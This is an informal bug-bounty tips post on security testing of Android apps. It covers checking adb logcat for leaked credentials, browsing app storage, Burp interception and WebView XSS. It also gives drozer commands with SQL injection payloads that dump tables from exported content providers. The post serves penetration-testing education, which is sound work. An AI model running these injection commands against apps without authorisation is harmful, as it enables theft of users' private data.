Some Tips to check on Android Apps
- Whenever you are registering or signing in Apps , jus try to run adb logcat and check whether registration pages or Login details are coming in logs
On Windows use:
adb shell ps | findstr -i <package name>
adb logcat | findstr <ps id>
Example: https://bugbountypoc.com/mediafire-andriod-app-leaking-sensitive-user-data/
2. Check for internal storage if it is rooted you can simply browse /data/data/application if it is non rooted phone you can follow link below
3. Check for content providers which are exported using drozer you can find sql injection in content providers.
Usage:
dz> run scanner.provider.injection -a <package name>
suppose say content provider com.google.setting provider is exported to true
dz> run app.provider.query content://com.google.settings/partner/
dz> run app.provider.query content://com.google.settings/partner/ — projection “* FROM SQLITE_MASTER WHERE type=’table’; — “
dz> run app.provider.query content://com.google.settings/partner/ — selection “1=1”
dz> run app.provider.query content://com.google.settings/partner/ — projection “* FROM partner; — “
3. Intercept the application in burp suite and check as how you do in normal web app
4.Decompile the APK and check for API’s which are using Web views, if you are lucky enough you will get XSS on mobile application.
Note: I am not so pro in reverse engineering, So above tips are the test cases I used where using there I found bugs in Apps.
